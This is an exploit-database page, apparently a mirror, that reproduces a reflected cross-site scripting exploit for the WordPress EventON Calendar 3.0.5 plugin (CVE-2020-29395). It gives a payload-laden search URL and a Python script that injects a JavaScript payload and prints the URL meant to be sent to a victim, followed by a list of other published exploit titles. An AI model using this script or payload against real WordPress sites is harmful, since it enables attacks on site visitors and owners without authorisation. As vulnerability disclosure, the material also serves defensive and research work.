Become a patron and gain access to the dashboard, Schedule scans, API and Search patron

Search for hundreds of thousands of exploits

"Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting"

Author

Exploit author

B3KC4T

Platform

Exploit platform

php

Release date

Exploit published date

2020-12-01

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
# Exploit Title: Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting
# Date: 27.11.2020
# Exploit Author: b3kc4t (Mustafa GUNDOGDU)
# Vendor Homepage: https://www.myeventon.com/
# Version: 3.0.5
# Tested on: Ubuntu 18.04
# CVE : 2020-29395
# Description Link:
https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS

"""
                 ~ VULNERABLITY DETAILS ~
    
    https://target/addons/?q=<svg/onload=alert(/b3kc4t/)>
    
    #
    WordPress sites that use EventOn Calendar cause reflected xss vulnerability to javascript payloads injected 
    into the search field.
    
    #
    The following python code will inject javascript code and print out url that will be sent to victim. 
    If you use unicode caracters for xss , exploit will print page source.

    ##USAGE##
    
    $ sudo python eventon_exploit.py --exploit --url https://target/addons/?q= --payload '<svg/onload=alert(/b3kc4t/)>'

    ##OUTPUT##

    [+] https://target/addons/?q=<svg/onload=alert(/b3kc4t/)>


"""
import requests
import sys
import argparse
from colorama import Fore
        
def vuln_reflected(url, payload):

    s = requests.Session()
    get_request = s.get(url+payload)
    
    if get_request.status_code == 500:
        print(Fore.GREEN+"[-] COULD BE WAF, NOT BE REALIZED XSS INJECTION [-]")

    else:
        content_result = str(get_request.content)
        search_find = content_result.find(payload)

        if search_find != -1:
            print(Fore.GREEN+"[+] "+str(url)+str(payload))

        else:

            print(content_result)


def main():

    desc = "Wordpress EventON Calendar Plugin XSS"
    parser = argparse.ArgumentParser(description=desc)
    exp_option = parser.add_argument_group('')
    parser.add_argument("--exploit", help ="", action='store_true')
    parser.add_argument("--url",help="", type=str, required=False)
    parser.add_argument("--payload",help="",type=str,required=False)

    args = parser.parse_args()

    if args.exploit:

        if args.url:

            if args.payload:
                url = args.url
                payload = args.payload
                vuln_reflected(url, payload)

if name == 'main':
    main()
Release Date Title Type Platform Author
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "Pharmacy Store Management System 1.0 - 'id' SQL Injection" webapps php "Aydın Baran Ertemir"
Release Date Title Type Platform Author
2020-12-01 "Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting" webapps php B3KC4T
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/49130/?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.